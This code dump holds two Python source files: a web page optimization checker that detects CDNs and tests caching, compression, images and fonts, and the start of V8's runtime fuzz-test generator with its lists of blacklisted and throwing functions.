'SwiftCDN': ['.swiftcdn1.com',
'.swiftserve.com'],
'Taobao': ['.gslb.taobao.com',
'tbcdn.cn',
'.taobaocdn.com'],
'Telenor': ['.cdntel.net'],
'TRBCDN': ['.trbcdn.net'],
'Twitter': ['.twimg.com'],
'UnicornCDN': ['.unicorncdn.net'],
'Universal CDN': ['.cdn12.com',
'.cdn13.com',
'.cdn15.com'],
'VegaCDN': ['.vegacdn.vn',
'.vegacdn.com'],
'VoxCDN': ['.voxcdn.net'],
'XLabs Security': ['.xlabs.com.br',
'.armor.zone'],
'Yahoo': ['.ay1.b.yahoo.com',
'.yimg.',
'.yahooapis.com'],
'Yottaa': ['.yottaa.net'],
'ZEIT Smart CDN': ['.zeit.co'],
'Zenedge': ['.zenedge.net']
}
self.cdn_headers = {
'Airee': [{'Server': 'Airee'}],
'Akamai': [{'x-akamai-staging': 'ESSL'},
{'x-akamai-request-id': ''}],
'Amazon CloudFront': [{'Via': 'CloudFront'}],
'Aryaka': [{'X-Ar-Debug': ''}],
'BelugaCDN': [{'Server': 'Beluga'},
{'X-Beluga-Cache-Status': ''}],
'BunnyCDN': [{'Server': 'BunnyCDN'}],
'Caspowa': [{'Server': 'Caspowa'}],
'CDN': [{'X-Edge-IP': ''},
{'X-Edge-Location': ''}],
'CDN77': [{'Server': 'CDN77'}],
'CDNetworks': [{'X-Px': ''}],
'ChinaNetCenter': [{'X-Cache': 'cache.51cdn.com'}],
'Cloudflare': [{'Server': 'cloudflare'}],
'Edgecast': [{'Server': 'ECS'},
{'Server': 'ECAcc'},
{'Server': 'ECD'}],
'Fastly': [{'X-Served-By': 'cache-', 'X-Cache': ''}],
'Fly': [{'Server': 'Fly.io'}],
'GoCache': [{'Server': 'gocache'}],
'Google': [{'Server': 'sffe'},
{'Server': 'gws'},
{'Server': 'ESF'},
{'Server': 'GSE'},
{'Server': 'Golfe2'},
{'Via': 'google'}],
'HiberniaCDN': [{'Server': 'hiberniacdn'}],
'Highwinds': [{'X-HW': ''}],
'Hosting4CDN': [{'x-cdn': 'H4CDN'}],
'ImageEngine': [{'Server': 'ScientiaMobile ImageEngine'}],
'Incapsula': [{'X-CDN': 'Incapsula'},
{'X-Iinfo': ''}],
'Instart Logic': [{'X-Instart-Request-ID': 'instart'}],
'LeaseWeb CDN': [{'Server': 'leasewebcdn'}],
'Medianova': [{'Server': 'MNCDN'}],
'Myra Security CDN': [{'Server': 'myracloud'}],
'Naver': [{'Server': 'Testa/'}],
'NetDNA': [{'Server': 'NetDNA'}],
'Netlify': [{'Server': 'Netlify'}],
'NGENIX': [{'x-ngenix-cache': ''}],
'NYI FTW': [{'X-Powered-By': 'NYI FTW'},
{'X-Delivered-By': 'NYI FTW'}],
'Optimal CDN': [{'Server': 'Optimal CDN'}],
'OVH CDN': [{'X-CDN-Geo': ''},
{'X-CDN-Pop': ''}],
'PageCDN': [{'X-CDN': 'PageCDN'}],
'PUSHR': [{'Via': 'PUSHR'}],
'QUIC.cloud': [{'X-QC-POP': '', 'X-QC-Cache': ''}],
'ReSRC.it': [{'Server': 'ReSRC'}],
'Rev Software': [{'Via': 'Rev-Cache'},
{'X-Rev-Cache': ''}],
'Roast.io': [{'Server': 'Roast.io'}],
'Rocket CDN': [{'x-rocket-node': ''}],
'section.io': [{'section-io-id': ''}],
'SwiftyCDN': [{'X-CDN': 'SwiftyCDN'}],
'Singular CDN': [{'Server': 'SingularCDN'}],
'Sirv CDN': [{'x-sirv-server': ''}],
'Sucuri Firewall': [{'Server': 'Sucuri/Cloudproxy'},
{'x-sucuri-id': ''}],
'Surge': [{'Server': 'SurgeCDN'}],
'Twitter': [{'Server': 'tsa_b'}],
'UnicornCDN': [{'Server': 'UnicornCDN'}],
'XLabs Security': [{'x-cdn': 'XLabs Security'}],
'Yunjiasu': [{'Server': 'yunjiasu'}],
'Zenedge': [{'X-Cdn': 'Zenedge'}],
'ZEIT Smart CDN': [{'Server': 'now'}],
'Zycada Networks': [{'X-Zy-Server': ''}]
}
# spell-checker: enable
def start(self):
"""Start running the optimization checks"""
logging.debug('Starting optimization checks...')
optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])
if self.requests is not None and not optimization_checks_disabled:
self.running_checks = True
# Run the slow checks in background threads
self.cdn_thread = threading.Thread(target=self.check_cdn)
self.hosting_thread = threading.Thread(target=self.check_hosting)
self.gzip_thread = threading.Thread(target=self.check_gzip)
self.image_thread = threading.Thread(target=self.check_images)
self.progressive_thread = threading.Thread(target=self.check_progressive)
self.font_thread = threading.Thread(target=self.check_fonts)
self.cdn_thread.start()
self.hosting_thread.start()
self.gzip_thread.start()
self.image_thread.start()
self.progressive_thread.start()
self.font_thread.start()
# collect the miscellaneous results directly
logging.debug('Checking keep-alive.')
self.check_keep_alive()
logging.debug('Checking caching.')
self.check_cache_static()
logging.debug('Optimization checks started.')
def join(self):
"""Wait for the optimization checks to complete and record the results"""
logging.debug('Waiting for optimization checks to complete')
if self.running_checks:
logging.debug('Waiting for progressive JPEG check to complete')
if self.progressive_thread is not None:
self.progressive_thread.join()
self.progressive_thread = None
if self.progressive_time is not None:
logging.debug("Progressive JPEG check took %0.3f seconds", self.progressive_time)
logging.debug('Waiting for gzip check to complete')
if self.gzip_thread is not None:
self.gzip_thread.join()
self.gzip_thread = None
if self.gzip_time is not None:
logging.debug("gzip check took %0.3f seconds", self.gzip_time)
logging.debug('Waiting for font check to complete')
if self.font_thread is not None:
self.font_thread.join()
self.font_thread = None
if self.font_time is not None:
logging.debug("font check took %0.3f seconds", self.font_time)
logging.debug('Waiting for image check to complete')
if self.image_thread is not None:
self.image_thread.join()
self.image_thread = None
if self.image_time is not None:
logging.debug("image check took %0.3f seconds", self.image_time)
logging.debug('Waiting for CDN check to complete')
if self.cdn_thread is not None:
self.cdn_thread.join()
self.cdn_thread = None
if self.cdn_time is not None:
logging.debug("CDN check took %0.3f seconds", self.cdn_time)
logging.debug('Waiting for Hosting check to complete')
if self.hosting_thread is not None:
self.hosting_thread.join()
self.hosting_thread = None
if self.hosting_time is not None:
logging.debug("Hosting check took %0.3f seconds", self.hosting_time)
# Merge the results together
for request_id in self.cdn_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cdn'] = self.cdn_results[request_id]
for request_id in self.gzip_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['gzip'] = self.gzip_results[request_id]
for request_id in self.image_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['image'] = self.image_results[request_id]
for request_id in self.progressive_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['progressive'] = self.progressive_results[request_id]
for request_id in self.font_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['font'] = self.font_results[request_id]
if self.task is not None and 'page_data' in self.task:
for name in self.hosting_results:
self.task['page_data'][name] = self.hosting_results[name]
# Save the results
if self.results:
path = os.path.join(self.task['dir'], self.task['prefix']) + '_optimization.json.gz'
gz_file = gzip.open(path, GZIP_TEXT, 7)
if gz_file:
gz_file.write(json.dumps(self.results))
gz_file.close()
logging.debug('Optimization checks complete')
return self.results
def check_keep_alive(self):
"""Check for requests where the connection is force-closed"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlsplit # pylint: disable=import-error
else:
from urlparse import urlsplit # pylint: disable=import-error
# build a list of origins and how many requests were issued to each
origins = {}
for request_id in self.requests:
request = self.requests[request_id]
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origin not in origins:
origins[origin] = 0
origins[origin] += 1
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'url' in request:
check = {'score': 100}
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origins[origin] > 1:
check['score'] = 100
keep_alive = self.get_header_value(request['response_headers'],
'Connection')
if keep_alive is not None and keep_alive.lower().strip().find('close') > -1:
check['score'] = 0
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['keep_alive'] = check
except Exception:
logging.exception('Error checking keep-alive')
def get_time_remaining(self, request):
"""See if a request is static and how long it can be cached for"""
from email.utils import parsedate
re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)')
is_static = False
time_remaining = -1
try:
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
if content_length == 0:
return is_static, time_remaining
if 'response_headers' in request:
content_type = self.get_header_value(request['response_headers'],
'Content-Type')
if content_type is None or \
(content_type.find('/html') == -1 and
content_type.find('/cache-manifest') == -1):
is_static = True
cache = self.get_header_value(request['response_headers'], 'Cache-Control')
pragma = self.get_header_value(request['response_headers'], 'Pragma')
expires = self.get_header_value(request['response_headers'], 'Expires')
max_age_matches = None
if cache is not None:
max_age_matches = re.search(re_max_age, cache)
cache = cache.lower()
if cache.find('no-store') > -1 or cache.find('no-cache') > -1:
is_static = False
if is_static and pragma is not None:
pragma = pragma.lower()
if pragma.find('no-cache') > -1:
is_static = False
if is_static:
time_remaining = 0
if max_age_matches is not None:
time_remaining = int(max_age_matches.groupdict().get('maxage'))
age = self.get_header_value(request['response_headers'], 'Age')
if time_remaining == 0:
is_static = False
time_remaining = -1
elif age is not None:
time_remaining -= int(re.search(r'\d+',
str(age).strip()).group())
elif expires is not None:
date = self.get_header_value(request['response_headers'], 'Date')
exp = time.mktime(parsedate(expires))
if date is not None:
now = time.mktime(parsedate(date))
else:
now = time.time()
time_remaining = int(exp - now)
if time_remaining < 0:
is_static = False
except Exception:
logging.exception('Error calculating time remaining')
return is_static, time_remaining
def check_cache_static(self):
"""Check static resources for how long they are cacheable for"""
for request_id in self.requests:
try:
request = self.requests[request_id]
check = {'score': -1, 'time': 0}
if 'status' in request and request['status'] == 200:
is_static, time_remaining = self.get_time_remaining(request)
if is_static:
check['time'] = time_remaining
if time_remaining >= 604800: # 7 days
check['score'] = 100
elif time_remaining >= 3600: # 1 hour
check['score'] = 50
else:
check['score'] = 0
if check['score'] >= 0:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cache'] = check
except Exception:
logging.exception('Error checking cache static')
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results['base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results['base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
logging.exception('Error checking hosting')
self.hosting_time = monotonic() - start
def check_cdn(self):
"""Check each request to see if it was served from a CDN"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlparse # pylint: disable=import-error
else:
from urlparse import urlparse # pylint: disable=import-error
start = monotonic()
# First pass, build a list of domains and see if the headers or domain matches
static_requests = {}
domains = {}
for request_id in self.requests:
request = self.requests[request_id]
is_static, _ = self.get_time_remaining(request)
if is_static:
static_requests[request_id] = True
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain not in domains:
# Check the domain itself against the CDN list
domains[domain] = ''
provider = self.check_cdn_name(domain)
if provider is not None:
domains[domain] = provider
# Spawn several workers to do CNAME lookups for the unknown domains
count = 0
for domain in domains:
if not domains[domain]:
count += 1
self.dns_lookup_queue.put(domain)
if count:
thread_count = min(10, count)
threads = []
for _ in range(thread_count):
thread = threading.Thread(target=self.dns_worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
try:
while True:
dns_result = self.dns_result_queue.get_nowait()
domains[dns_result['domain']] = dns_result['provider']
except Exception:
pass
# Final pass, populate the CDN info for each request
for request_id in self.requests:
check = {'score': -1, 'provider': ''}
request = self.requests[request_id]
if request_id in static_requests:
check['score'] = 0
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain in domains and domains[domain]:
check['score'] = 100
check['provider'] = domains[domain]
if not check['provider'] and 'response_headers' in request:
provider = self.check_cdn_headers(request['response_headers'])
if provider is not None:
check['score'] = 100
check['provider'] = provider
self.cdn_results[request_id] = check
self.cdn_time = monotonic() - start
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
dns_resolver.lifetime = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def dns_worker(self):
"""Handle the DNS CNAME lookups and checking in multiple threads"""
try:
while True:
domain = self.dns_lookup_queue.get_nowait()
try:
provider = self.find_dns_cdn(domain)
if provider is not None:
self.dns_result_queue.put({'domain': domain, 'provider': provider})
except Exception:
logging.debug('Error in dns worker')
self.dns_lookup_queue.task_done()
except Exception:
pass
def check_cdn_name(self, domain):
"""Check the given domain against our cname list"""
if domain is not None and len(domain):
check_name = domain.lower()
for cdn in self.cdn_cnames:
for cname in self.cdn_cnames[cdn]:
if check_name.find(cname) > -1:
return cdn
return None
def check_cdn_headers(self, headers):
"""Check the given headers against our header list"""
matched_cdns = []
for cdn in self.cdn_headers:
for header_group in self.cdn_headers[cdn]:
all_match = True
for name in header_group:
value = self.get_header_value(headers, name)
if value is None:
all_match = False
break
else:
value = value.lower()
check = header_group[name].lower()
if len(check) and value.find(check) == -1:
all_match = False
break
if all_match:
matched_cdns.append(cdn)
break
if not len(matched_cdns):
return None
return ', '.join(matched_cdns)
def check_gzip(self):
"""Check each request to see if it can be compressed"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if 'objectSize' in request:
content_length = request['objectSize']
elif content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
if content_length is None:
content_length = 0
check = {'score': 0, 'size': content_length, 'target_size': content_length}
encoding = None
if 'response_headers' in request:
encoding = self.get_header_value(request['response_headers'],
'Content-Encoding')
# Check for responses that are already compressed (ignore the level)
if encoding is not None:
if encoding.find('gzip') >= 0 or \
encoding.find('deflate') >= 0 or \
encoding.find('br') >= 0:
check['score'] = 100
# Ignore small responses that will fit in a packet
if not check['score'] and content_length < 1400:
check['score'] = -1
# Try compressing it if it isn't an image
if not check['score'] and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None:
check['score'] = -1
else:
out_file = request['body'] + '.gzip'
with open(request['body'], 'rb') as f_in:
with gzip.open(out_file, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
if os.path.isfile(out_file):
target_size = os.path.getsize(out_file)
try:
os.remove(out_file)
except Exception:
pass
if target_size is not None:
delta = content_length - target_size
# Only count it if there is at least 1 packet and 10% savings
if target_size > 0 and \
delta > 1400 and \
target_size < (content_length * 0.9):
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = -1
else:
check['score'] = -1
else:
check['score'] = -1
if check['score'] >= 0:
self.gzip_results[request_id] = check
except Exception:
logging.exception('Error checking gzip')
self.gzip_time = monotonic() - start
def check_images(self):
"""Check each request to see if images can be compressed better"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
check = {'score': -1, 'size': content_length, 'target_size': content_length}
if content_length and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
if content_length < 1400:
check['score'] = 100
else:
# Compress it as a quality 85 stripped progressive image and compare
jpeg_file = request['body'] + '.jpg'
command = '{0} -define jpeg:dct-method=fast -strip '\
'-interlace Plane -quality 85 '\
'"{1}" "{2}"'.format(self.job['image_magick']['convert'],
request['body'], jpeg_file)
subprocess.call(command, shell=True)
if os.path.isfile(jpeg_file):
target_size = os.path.getsize(jpeg_file)
try:
os.remove(jpeg_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'png':
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
if content_length < 1400:
check['score'] = 100
else:
# spell-checker: disable
image_chunks = [b"iCCP", b"tIME", b"gAMA", b"PLTE", b"acTL", b"IHDR", b"cHRM",
b"bKGD", b"tRNS", b"sBIT", b"sRGB", b"pHYs", b"hIST", b"vpAg",
b"oFFs", b"fcTL", b"fdAT", b"IDAT"]
# spell-checker: enable
body = request['response_body']
image_size = len(body)
valid = True
target_size = 8
bytes_remaining = image_size - 8
pos = 8
while valid and bytes_remaining >= 4:
chunk_len = struct.unpack('>I', body[pos: pos + 4])[0]
pos += 4
if chunk_len + 12 <= bytes_remaining:
chunk_type = body[pos: pos + 4]
pos += 4
if chunk_type in image_chunks:
target_size += chunk_len + 12
pos += chunk_len + 4 # Skip the data and CRC
bytes_remaining -= chunk_len + 12
else:
valid = False
bytes_remaining = 0
if valid:
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'gif':
if content_length < 1400:
check['score'] = 100
else:
is_animated = False
from PIL import Image
with Image.open(request['body']) as gif:
try:
gif.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
if is_animated:
check['score'] = 100
else:
# Convert it to a PNG
png_file = request['body'] + '.png'
command = 'convert "{0}" "{1}"'.format(request['body'], png_file)
subprocess.call(command, shell=True)
if os.path.isfile(png_file):
target_size = os.path.getsize(png_file)
try:
os.remove(png_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'webp':
check['score'] = 100
if check['score'] >= 0:
self.image_results[request_id] = check
except Exception:
logging.exception('Error checking images')
self.image_time = monotonic() - start
def check_progressive(self):
"""Count the number of scan lines in each jpeg"""
from PIL import Image
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
check = {'size': os.path.getsize(request['body']), 'scan_count': 1}
image = Image.open(request['body'])
info = dict(image.info)
image.close()
if 'progression' in info and info['progression']:
check['scan_count'] = 0
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
body = request['response_body']
content_length = len(request['response_body'])
pos = 0
try:
while pos < content_length:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block != 0xff:
break
block = struct.unpack('B', body[pos])[0]
pos += 1
while block == 0xff:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block == 0x01 or (block >= 0xd0 and block <= 0xd9):
continue
elif block == 0xda: # Image data
check['scan_count'] += 1
# Seek to the next non-padded 0xff to find the next marker
found = False
while not found and pos < content_length:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value == 0xff:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value != 0x00:
found = True
pos -= 2
else:
chunk = body[pos: pos + 2]
block_size = struct.unpack('2B', chunk)
pos += 2
block_size = block_size[0] * 256 + block_size[1] - 2
pos += block_size
except Exception:
logging.exception('Error scanning JPEG')
self.progressive_results[request_id] = check
except Exception:
logging.exception('Error checking progressive')
self.progressive_time = monotonic() - start
def check_fonts(self):
"""Check each request to extract metadata about fonts"""
start = monotonic()
try:
from fontTools.ttLib import TTFont
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None and sniff_type in ['OTF', 'TTF', 'WOFF', 'WOFF2']:
tables = None
ttf = TTFont(request['body'], lazy=True)
reader = ttf.reader
tags = sorted(reader.keys())
for tag in tags:
entry = reader.tables[tag]
if tables is None:
tables = {}
tables[tag] = entry.length
ttf.close()
if tables is not None:
self.font_results[request_id] = {'table_sizes': tables}
except Exception:
logging.exception('Error checking font')
except Exception:
pass
self.font_time = monotonic() - start
def get_header_value(self, headers, name):
"""Get the value for the requested header"""
value = None
if headers:
if name in headers:
value = headers[name]
else:
find = name.lower()
for header_name in headers:
check = header_name.lower()
if check == find or (check[0] == ':' and check[1:] == find):
value = headers[header_name]
break
return value
def sniff_content(self, raw_bytes):
"""Check the beginning of the file to see if it is a known image type"""
content_type = None
hex_bytes = binascii.hexlify(raw_bytes[:14])
# spell-checker: disable
if hex_bytes[0:6] == b'ffd8ff':
content_type = 'jpeg'
elif hex_bytes[0:16] == b'89504e470d0a1a0a':
content_type = 'png'
elif raw_bytes[:6] == b'GIF87a' or raw_bytes[:6] == b'GIF89a':
content_type = 'gif'
elif raw_bytes[:4] == b'RIFF' and raw_bytes[8:14] == b'WEBPVP':
content_type = 'webp'
elif raw_bytes[:4] == b'OTTO':
content_type = 'OTF'
elif raw_bytes[:4] == b'ttcf':
content_type = 'TTF'
elif raw_bytes[:4] == b'wOFF':
content_type = 'WOFF'
elif raw_bytes[:4] == b'wOF2':
content_type = 'WOFF2'
# spell-checker: enable
return content_type
def sniff_file_content(self, image_file):
"""Sniff the content type from a file"""
content_type = None
with open(image_file, 'rb') as f_in:
raw = f_in.read(14)
content_type = self.sniff_content(raw)
return content_type
|
generate-runtime-tests.py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import js2c
import multiprocessing
import optparse
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import time
FILENAME = "src/runtime.cc"
HEADERFILENAME = "src/runtime.h"
FUNCTION = re.compile("^RUNTIME_FUNCTION\(Runtime_(\w+)")
ARGSLENGTH = re.compile(".*ASSERT\(.*args\.length\(\) == (\d+)\);")
FUNCTIONEND = "}\n"
MACRO = re.compile(r"^#define ([^ ]+)\(([^)]*)\) *([^\\]*)\\?\n$")
FIRST_WORD = re.compile("^\s*(.*?)[\s({\[]")
WORKSPACE = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
BASEPATH = os.path.join(WORKSPACE, "test", "mjsunit", "runtime-gen")
THIS_SCRIPT = os.path.relpath(sys.argv[0])
# Expand these macros, they define further runtime functions.
EXPAND_MACROS = [
"BUFFER_VIEW_GETTER",
"DATA_VIEW_GETTER",
"DATA_VIEW_SETTER",
"RUNTIME_UNARY_MATH",
]
# TODO(jkummerow): We could also whitelist the following macros, but the
# functions they define are so trivial that it's unclear how much benefit
# that would provide:
# ELEMENTS_KIND_CHECK_RUNTIME_FUNCTION
# FIXED_TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# Counts of functions in each detection state. These are used to assert
# that the parser doesn't bit-rot. Change the values as needed when you add,
# remove or change runtime functions, but make sure we don't lose our ability
# to parse them!
EXPECTED_FUNCTION_COUNT = 358
EXPECTED_FUZZABLE_COUNT = 326
EXPECTED_CCTEST_COUNT = 6
EXPECTED_UNKNOWN_COUNT = 4
EXPECTED_BUILTINS_COUNT = 798
# Don't call these at all.
BLACKLISTED = [
"Abort", # Kills the process.
"AbortJS", # Kills the process.
"CompileForOnStackReplacement", # Riddled with ASSERTs.
"IS_VAR", # Not implemented in the runtime.
"ListNatives", # Not available in Release mode.
"SetAllocationTimeout", # Too slow for fuzzing.
"SystemBreak", # Kills (int3) the process.
# These are weird. They violate some invariants when called after
# bootstrapping.
"DisableAccessChecks",
"EnableAccessChecks",
# The current LiveEdit implementation relies on and messes with internals
# in ways that makes it fundamentally unfuzzable :-(
"DebugGetLoadedScripts",
"DebugSetScriptSource",
"LiveEditFindSharedFunctionInfosForScript",
"LiveEditFunctionSourceUpdated",
"LiveEditGatherCompileInfo",
"LiveEditPatchFunctionPositions",
"LiveEditReplaceFunctionCode",
"LiveEditReplaceRefToNestedFunction",
"LiveEditReplaceScript",
"LiveEditRestartFrame",
"SetScriptBreakPoint",
# TODO(jkummerow): Fix these and un-blacklist them!
"CreateDateTimeFormat",
"CreateNumberFormat",
]
# These will always throw.
THROWS = [
"CheckExecutionState", # Needs to hit a break point.
"CheckIsBootstrapping", # Needs to be bootstrapping.
"DebugEvaluate", # Needs to hit a break point.
"DebugEvaluateGlobal", # Needs to hit a break point.
"DebugIndexedInterceptorElementValue", # Needs an indexed interceptor.
"DebugNamedInterceptorPropertyValue", # Needs a named interceptor.
"DebugSetScriptSource", # Checks compilation state of script.
"GetAllScopesDetails", # Needs to hit a break point.
"GetFrameCount", # Needs to hit a break point.
"GetFrameDetails", # Needs to hit a break point.
"GetRootNaN", # Needs to be bootstrapping.
"GetScopeCount", # Needs to hit a break point.
"GetScopeDetails", # Needs to hit a break point.
"GetStepInPositions", # Needs to hit a break point.
"GetTemplateField", # Needs a {Function,Object}TemplateInfo.
"GetThreadCount", # Needs to hit a break point.
"GetThreadDetails", # Needs to hit a break point.
"IsAccessAllowedForObserver", # Needs access-check-required object.
"UnblockConcurrentRecompilation" # Needs --block-concurrent-recompilation.
]
# Definitions used in CUSTOM_KNOWN_GOOD_INPUT below.
_BREAK_ITERATOR = (
"%GetImplFromInitializedIntlObject(new Intl.v8BreakIterator())")
_COLLATOR = "%GetImplFromInitializedIntlObject(new Intl.Collator('en-US'))"
_DATETIME_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.DateTimeFormat('en-US'))")
_NUMBER_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.NumberFormat('en-US'))")
# Custom definitions for function input that does not throw.
# Format: "FunctionName": ["arg0", "arg1", ..., argslength].
# None means "fall back to autodetected value".
CUSTOM_KNOWN_GOOD_INPUT = {
"Apply": ["function() {}", None, None, None, None, None],
"ArrayBufferSliceImpl": [None, None, 0, None],
"ArrayConcat": ["[1, 'a']", None],
"BreakIteratorAdoptText": [_BREAK_ITERATOR, None, None],
"BreakIteratorBreakType": [_BREAK_ITERATOR, None],
"BreakIteratorCurrent": [_BREAK_ITERATOR, None],
"BreakIteratorFirst": [_BREAK_ITERATOR, None],
"BreakIteratorNext": [_BREAK_ITERATOR, None],
"CompileString": [None, "false", None],
"CreateBreakIterator": ["'en-US'", "{type: 'string'}", None, None],
"CreateJSFunctionProxy": [None, "function() {}", None, None, None],
"CreatePrivateSymbol": ["\"foo\"", None],
"CreateSymbol": ["\"foo\"", None],
"DateParseString": [None, "new Array(8)", None],
"DefineOrRedefineAccessorProperty": [None, None, "function() {}",
"function() {}", 2, None],
"FunctionBindArguments": [None, None, "undefined", None, None],
"GetBreakLocations": [None, 0, None],
"GetDefaultReceiver": ["function() {}", None],
"GetImplFromInitializedIntlObject": ["new Intl.NumberFormat('en-US')", None],
"InternalCompare": [_COLLATOR, None, None, None],
"InternalDateFormat": [_DATETIME_FORMAT, None, None],
"InternalDateParse": [_DATETIME_FORMAT, None, None],
"InternalNumberFormat": [_NUMBER_FORMAT, None, None],
"InternalNumberParse": [_NUMBER_FORMAT, None, None],
"IsSloppyModeFunction": ["function() {}", None],
"LoadMutableDouble": ["{foo: 1.2}", None, None],
"NewObjectFromBound": ["(function() {}).bind({})", None],
"NumberToRadixString": [None, "2", None],
"ParseJson": ["\"{}\"", 1],
"RegExpExecMultiple": [None, None, "['a']", "['a']", None],
"SetAccessorProperty": [None, None, "undefined", "undefined", None, None,
None],
"SetIteratorInitialize": [None, None, "2", None],
"SetDebugEventListener": ["undefined", None, None],
"SetFunctionBreakPoint": [None, 200, None, None],
"StringBuilderConcat": ["[1, 2, 3]", 3, None, None],
"StringBuilderJoin": ["['a', 'b']", 4, None, None],
"StringMatch": [None, None, "['a', 'b']", None],
"StringNormalize": [None, 2, None],
"StringReplaceGlobalRegExpWithString": [None, None, None, "['a']", None],
"TypedArrayInitialize": [None, 6, "new ArrayBuffer(8)", None, 4, None],
